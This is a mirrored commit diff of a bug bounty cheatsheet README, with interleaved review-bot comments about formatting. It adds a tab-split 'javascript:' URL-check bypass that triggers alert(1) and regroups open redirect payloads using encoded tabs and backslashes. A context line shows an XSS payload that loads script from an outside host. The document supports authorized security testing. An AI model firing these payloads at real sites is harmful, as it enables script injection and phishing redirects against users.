mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-25 04:20:19 +00:00
Merge branch 'master' of github.com:EdOverflow/bugbounty-cheatsheet
commit
1351147c92
1 changed files with 8 additions and 6 deletions
14
README.md
@ -40,6 +40,12 @@ Note: This kind of depends on what security level the application is set to. See
$.get('http://sakurity.com/jqueryxss')
```
**URL verification bypasses (works without `	` too)**
```html
javas	cript://www.google.com/%0Aalert(1)
```
## SQLI
**Akamai Kona Bypass**
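Review bot: The heading and payload added before `## SQLI` depend on a whitespace character that cannot be identified from the text: the backticks in the "works without ... too" heading and the gap inside `javas...cript:` both show only blank space. Name the character in words or in an escaped form next to the payload so a reader can tell which one is meant. The block is also fenced as `html` although it holds a bare URL, and the entry does not say what kind of URL check it is aimed at. A sentence noting that parsers following the WHATWG URL standard strip ASCII tab and newline before reading the scheme would tell people maintaining such a check to normalise the input before comparing scheme and host.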
@ -137,15 +143,11 @@ If the target is running their application in debug mode you might be able to ru
## Open Redirect
```
/google.com
/%09/google.com
```
```
%09/google.com
```
```
%5cgoogle.com
/%5cgoogle.com
```
```
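Review bot: The Open Redirect payloads (`/%09/google.com`, `%09/google.com`, `%5cgoogle.com`, `/%5cgoogle.com`) are listed with no text saying what each variant depends on, and they are spread over several untagged fences, some holding one entry and some two. Add a line per group noting that `%09` is an encoded tab and `%5c` an encoded backslash, and keep one fence per technique. The hunk header shows the section going from 15 lines to 11, so it is worth confirming that no variant was dropped in the merge.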